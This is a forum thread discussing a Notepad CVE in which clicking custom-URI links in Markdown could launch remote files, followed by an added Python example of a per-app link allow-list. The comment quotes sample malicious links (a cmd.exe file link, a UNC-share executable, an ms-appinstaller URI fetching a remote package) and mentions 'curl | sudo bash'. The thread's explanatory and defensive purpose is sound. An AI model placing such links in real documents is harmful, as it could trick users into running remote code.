
Comment by NetMageSCW

21 hours ago

Except memory-unsafe and fringe features have nothing to do with this CVE, which seems incredibly dumb on the face of it.

Replace Notepad with Chrome or Edge - clicking on a link downloads content from the Internet! Oh noes!

I haven't had time to look at it in detail but surely the vulnerability is more than a "click a URL".

  • No, that's exactly what the vulnerability is as far as I know.

    "An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files." https://msrc.microsoft.com/update-guide/vulnerability/CVE-20...

    Imagine some Markdown:

        [link](https://badsite.com)
        [link](file://C:/windows/system32/cmd.exe)
        [link](file://\\1.2.3.4\share\foo.exe)
        [link](ms-appinstaller://?source=https://badsite.com/bad.appx)

    Wordpad, Notepad++ and many others highlight the URL in the first three lines and let you double-click it, and yes, they use the shell to open cmd.exe; yes, they open remote shares (and if the share is genuinely remote, the shell throws up a warning prompt asking if you want to connect). Wordpad always asks whether you want to open the link (and shows the link) before doing it, but you can click "Yes".

    What's beyond the pale is that MS's new Notepad highlighted custom URIs like the fourth link, and let you click to open it without a prompt. Even web browsers will prompt at least once with a special modal dialogue, the first time you click on a link to a custom URI. For safety, a text editor should stick to highlighting http/https/file URIs only.

    That's the "RCE", in the same way that telling a Linux user to type "curl | sudo bash" in their shell is "RCE".

    The fix is that clicking the link now gives a dialogue box asking if you really want to open it; remember to click No if you're not sure.

    • I wish they had made it clearer that this is the issue. That's what it came across to me as, but I couldn't say for sure that's what they meant, because the CVE pages didn't make it obvious. And the comments here didn't help, because everyone is just complaining about feature creep rather than discussing the actual problem.

      Anyway, what this now has me thinking is, should protecting against this be expected to be done per-app or should it be at the OS level? It seems like it would make more sense to have the OS keep records on what application is allowed to open what kinds of links. Maybe with some mechanism to allow the app to cooperate with the OS if they want finer-grained permissions (such as a chat app passing the poster's user ID to the OS when invoking the link, so you could set an 'always allow' rule for links from specific users rather than the full app).
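An added example, not code from Notepad, Microsoft, or any of the commenters, that puts both ideas in the thread above into working form: the rule that a text editor should treat only http/https/file targets as links and should prompt (showing the full target) before handing anything else to the shell, and the reply's suggestion of a per-application, per-scheme policy with a remembered "always allow". The POLICY table, the app names, the helper names and the sample Markdown are all constructed for illustration; the four link targets are the ones quoted in the comment.

```python
"""Link-activation policy for an editor that renders Markdown (added example)."""
import re
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple

OPEN, PROMPT, DENY = "open", "prompt", "deny"

# Inline Markdown link: [text](target). Constructed; reference-style links are ignored.
LINK_RE = re.compile(r"\[([^\]]*)\]\(([^)\s]+)\)")
# RFC 3986 scheme followed by ':'
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")

# Hypothetical per-application policy table: scheme -> action.
# Any scheme absent from an app's table is denied, so a custom URI such as
# ms-appinstaller: is never highlighted, let alone launched, without a rule.
POLICY = {
    "text-editor": {"http": OPEN, "https": OPEN, "file": PROMPT},
    "chat-client": {"http": OPEN, "https": OPEN, "mailto": PROMPT},
}


@dataclass
class Decision:
    target: str
    scheme: Optional[str]
    action: str
    reason: str


def scheme_of(target: str) -> Optional[str]:
    """Scheme of a link target, or None for relative paths and Windows drive paths (C:/...)."""
    m = SCHEME_RE.match(target)
    if not m or len(m.group(1)) == 1:      # a single letter before ':' is a drive, not a scheme
        return None
    return m.group(1).lower()


def file_target_is_remote(target: str) -> bool:
    """True when a file: URI names a UNC/network host rather than a local path.

    Backslashes are folded to '/' first so file://\\\\host\\share and
    file:////host/share are treated alike.
    """
    rest = target[len("file:"):].replace("\\", "/")
    if not rest.startswith("//"):
        return False                        # file:C:/x -> local
    rest = rest[2:]
    if rest.startswith("//"):
        return True                         # file:////host/share -> remote
    host = rest.split("/", 1)[0]
    if host == "" or host.lower() == "localhost" or re.fullmatch(r"[A-Za-z]:", host):
        return False                        # file:///C:/x, file://C:/x, file://localhost/x
    return True                             # file://host/share -> remote


def decide(app: str, target: str,
           remembered: FrozenSet[Tuple[str, str]] = frozenset()) -> Decision:
    """Apply the app's policy to one link target.

    `remembered` holds (app, scheme) pairs the user has marked "always allow";
    it can lift a PROMPT to OPEN but never a DENY, and never for a remote share.
    """
    scheme = scheme_of(target)
    if scheme is None:
        return Decision(target, None, DENY, "no scheme: render as plain text")
    table = POLICY.get(app, {})
    if scheme not in table:
        return Decision(target, scheme, DENY, f"{scheme}: not in allow-list for {app}")
    action = table[scheme]
    reason = f"{app} policy: {scheme} -> {action}"
    if scheme == "file" and file_target_is_remote(target):
        # Mirror the shell's own network warning: a remote share always prompts.
        return Decision(target, scheme, PROMPT, "file URI points at a remote share")
    if action == PROMPT and (app, scheme) in remembered:
        action, reason = OPEN, f"user chose 'always allow' for {scheme} in {app}"
    return Decision(target, scheme, action, reason)


def prompt_text(d: Decision) -> str:
    """Dialog body for a PROMPT decision: always show the full target, default to No."""
    return f"Open {d.target!r}? ({d.reason}) [Yes / No(default)]"


def triage_markdown(app: str, markdown: str, remembered=frozenset()) -> List[Decision]:
    """Decide every inline link in a Markdown document."""
    return [decide(app, target, remembered) for _text, target in LINK_RE.findall(markdown)]


# Constructed sample: the four links quoted in the comment plus two controls.
SAMPLE_MD = r"""
[link](https://badsite.com)
[link](file://C:/windows/system32/cmd.exe)
[link](file://\\1.2.3.4\share\foo.exe)
[link](ms-appinstaller://?source=https://badsite.com/bad.appx)
[mail](mailto:someone@example.com)
[rel](docs/readme.md)
"""

if __name__ == "__main__":
    for d in triage_markdown("text-editor", SAMPLE_MD):
        print(f"{d.action:6}  {d.target:55}  {d.reason}")
```

Run stand-alone it classifies the sample as open / prompt / prompt / deny / deny / deny: the https link opens, both file: links prompt (the UNC one with a remote-share reason that a remembered "always allow" cannot override), and the ms-appinstaller:, mailto: and relative targets are not treated as links at all for the text editor because they have no entry in its table. The scheme parser deliberately ignores a single letter before the colon so that a bare Windows path like C:/foo is not mistaken for a custom scheme.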